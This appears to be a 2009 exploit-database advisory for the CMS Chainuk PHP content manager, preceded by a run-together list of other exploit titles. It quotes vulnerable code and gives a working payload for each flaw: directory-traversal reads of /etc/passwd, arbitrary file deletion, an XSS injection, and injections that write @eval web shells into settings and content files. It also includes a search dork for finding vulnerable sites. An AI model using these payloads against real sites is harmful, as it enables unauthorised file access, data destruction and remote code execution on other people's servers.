
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
138 lines
3.9 KiB
Text
Executable file
138 lines
3.9 KiB
Text
Executable file
CMS Chainuk <= v.1.2 Vulns
|
|
Home: Cms.tut.su
|
|
Dork: "Cms.tut.su, 2009 g."
|
|
|
|
eLwaux(c) 14.06.2
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
LFI
|
|
/index.php
|
|
---------------------------------------------------------------------------
|
|
6: if (isset($_GET ['id']))
|
|
7: {
|
|
8: [color=white]$id = $_GET ['id'];[/color]
|
|
9: }
|
|
10: else
|
|
11: {
|
|
12: $id = $index;
|
|
13: }
|
|
14: if (file_exists ("content/" . $id . ".php"))
|
|
15: {
|
|
16: [color=white]include ("content/" . $id . ".php");[/color]
|
|
17: }
|
|
18: else
|
|
19: {
|
|
20: include ('404.html'); exit;
|
|
21: }
|
|
--------------------------------------------------------------------------
|
|
|
|
exploit:
|
|
index.php?id=../../../../etc/passwd%00
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
LFI
|
|
/admin/admin_edit.php
|
|
---------------------------------------------------------------------------
|
|
2: if (isset($_GET['id']))
|
|
3: {
|
|
4: [color=white]$id = $_GET['id'];[/color]
|
|
5: if (!file_exists("../content/" . $id . ".php")) die ("..");
|
|
6: [color=white]include("../content/" . $id . ".php");[/color]
|
|
23: }
|
|
-----------------------------------------------------------------------------
|
|
|
|
exploit:
|
|
index.php?id=../../../../etc/passwd%00
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
delete any files ()
|
|
/admin/admin_delete.php[
|
|
---------------------------------------------------------------------------
|
|
3: if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
|
|
4: {
|
|
5: echo 'Page '.$_GET['id'].' deleted';[/code]
|
|
-----------------------------------------------------------------------------
|
|
|
|
exploit:
|
|
/admin/admin_delete.php?id=../FILE.PHP%00
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
LFI / XSS / Shell
|
|
/admin/admin_menu.php
|
|
-----------------------------------------------------------------------------
|
|
37: $menu = explode (',', $_POST['menu']);
|
|
38: $csvcont ='';
|
|
39: foreach ($menu as $a)
|
|
40: {
|
|
41: if (!preg_match("/[0-9]/", $a)) die ("error");
|
|
42: if (!file_exists("../content/" . $a . ".php")) die ("error");
|
|
43: [color=white]include ("../content/" . $a . ".php");[/color]
|
|
44: $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
|
|
45: }
|
|
65: if (!file_put_contents("../menu.csv", $csvcont)) ..
|
|
-----------------------------------------------------------------------------
|
|
|
|
exploits:
|
|
LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
|
|
XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7
|
|
Shell: if <asp_tags: On> POST: menu=../1
|
|
<asp=@eval(\$_GET[a]);asp>/../admin/passw,1,2,3,4,5,6,7
|
|
/?id=../menu.csv%00&a=phpinfo();[/CoDE]
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
Shell
|
|
/admin_settings.php
|
|
-----------------------------------------------------------------------------
|
|
39: if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
|
|
!isset($_POST['menu']))
|
|
40: {
|
|
41: die ("...");
|
|
42: }
|
|
43: if (!file_exists("../templates/" . $_POST['tmpl'] .
|
|
"/index.php")) die ("...");
|
|
44: if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
|
|
45: $mtpl = $_POST['menu'];
|
|
46: $set = "<? \$curr_tmpl='" . $_POST['tmpl'] . "'; \$index="=
|
|
$_POST['id'] . "; \$menu_tmpl = \"" . $mtpl . "\"; ?>";
|
|
63: if (!file_put_contents("../settings.php", $set)
|
|
-----------------------------------------------------------------------------
|
|
|
|
exploit:
|
|
POST: action=abc
|
|
tmpl=default
|
|
id=1
|
|
menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
|
|
Shell: /settings.php?a=phpinfo();
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
Shell
|
|
/admin_new.php
|
|
-----------------------------------------------------------------------------
|
|
POST: action=abc
|
|
text=abc
|
|
title='; @eval($_GET[a]); //
|
|
descr=abc
|
|
keys=abc
|
|
link=abc[/code]
|
|
/content/=NUMBER.php?a=phpinfo();
|
|
|
|
|
|
## ## ## ## ## ##
|
|
|
|
Path Disclosure
|
|
/index.php?id=../admin/passw
|
|
/admin/admin_delete.php?id=thisf0ld3risn0texi5s5
|
|
|
|
# milw0rm.com [2009-07-01]
|